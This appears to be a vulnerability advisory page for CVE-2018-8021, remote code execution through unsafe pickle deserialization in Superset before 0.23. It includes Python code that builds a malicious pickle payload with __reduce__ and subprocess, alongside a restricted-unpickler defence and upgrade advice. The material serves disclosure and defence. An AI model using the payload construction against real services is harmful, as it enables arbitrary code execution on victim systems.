CVE-2018-8021
Deserialization of Untrusted Data in superset
9.8
CRITICAL
CVSS 3.1
EPSS 64.3%
Description
Versions of Superset prior to 0.23 used an unsafe load method from the pickle library to deserialize data leading to possible remote code execution. Note Superset 0.23 was released prior to any Superset release under the Apache Software Foundation.
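The mechanism behind this advisory, as an added example that is not Superset's code: a pickle stream can name any importable callable and its arguments, and `pickle.loads` invokes it during deserialization, so feeding attacker-controlled bytes to `pickle.loads` is code execution, not just data parsing. The block also shows a restricted `Unpickler` that refuses any global not on an allow-list; it is a stopgap for code you cannot replace, not a substitute for the upgrade, and the allow-list contents are an assumption chosen for the example. The "command" in the constructed payload is the interpreter printing a marker so the example runs anywhere.

```python
"""Added example (not Superset code): pickle.loads on untrusted bytes is RCE,
and what a restricted loader looks like."""
import io
import pickle
import subprocess
import sys


class _Payload:
    """Constructed attacker object: __reduce__ tells pickle to serialise
    'call subprocess.check_output(args)'. The unpickler performs the call."""

    def __reduce__(self):
        return (subprocess.check_output,
                ([sys.executable, "-c", "print('pwned')"],))


def build_malicious_pickle() -> bytes:
    # The resulting bytes reference subprocess.check_output by name only;
    # no reference to _Payload survives, so any consumer can be targeted.
    return pickle.dumps(_Payload())


def unsafe_load(data: bytes):
    """Vulnerable pattern: deserialise whatever arrived. pickle.loads runs
    the embedded call and returns whatever it returned."""
    return pickle.loads(data)


# Assumed allow-list for the hardened loader: harmless builtins only.
_ALLOWED = {"builtins": {"range", "slice", "set", "frozenset"}}


class _RestrictedUnpickler(pickle.Unpickler):
    """find_class is consulted for every GLOBAL/STACK_GLOBAL opcode, i.e. for
    every function or class the stream tries to resolve. Refuse everything
    that is not explicitly allowed, before any code can run."""

    def find_class(self, module, name):
        if name in _ALLOWED.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to load {module}.{name}")


def restricted_load(data: bytes):
    return _RestrictedUnpickler(io.BytesIO(data)).load()


def refuses(data: bytes) -> bool:
    """True if the restricted loader rejects the stream."""
    try:
        restricted_load(data)
    except pickle.UnpicklingError:
        return True
    return False


def roundtrip_ok(obj) -> bool:
    """True if a benign object survives pickle -> restricted_load intact."""
    return restricted_load(pickle.dumps(obj)) == obj


if __name__ == "__main__":
    print("unsafe_load ran the payload, got:", unsafe_load(build_malicious_pickle()))
    print("restricted_load refused it:", refuses(build_malicious_pickle()))
    print("benign data still loads:", roundtrip_ok({"rows": [1, 2]}), roundtrip_ok(range(3)))
```

The first assertion-worthy result is that `unsafe_load` returns the command's output: the victim process ran the attacker's payload just by parsing the bytes. The durable fix is to stop using pickle for anything that crosses a trust boundary (JSON for plain data); the restricted loader only narrows the attack surface and still requires you to audit every allowed name, since a permissive allow-list reintroduces the problem.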
How to fix CVE-2018-8021
To remediate CVE-2018-8021, upgrade the affected package to a fixed version below.
- PyPI/superset: upgrade to 0.23 (also listed as 0.23.0) or later
Is CVE-2018-8021 being exploited?
Likely. EPSS estimates a 64.3% probability of exploitation activity in the next 30 days, which places CVE-2018-8021 in the top tier of vulnerabilities by exploitation probability. EPSS is a predictive score, not confirmation of observed attacks, but an unauthenticated pickle deserialization bug is trivial to weaponize, so prioritise patching.
Affected packages
- superset (PyPI): all versions from 0, < 0.23 (also listed as < 0.23.0)
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | CRITICAL 9.3 | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| osv | CVSS 3.0 | CRITICAL 9.8 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |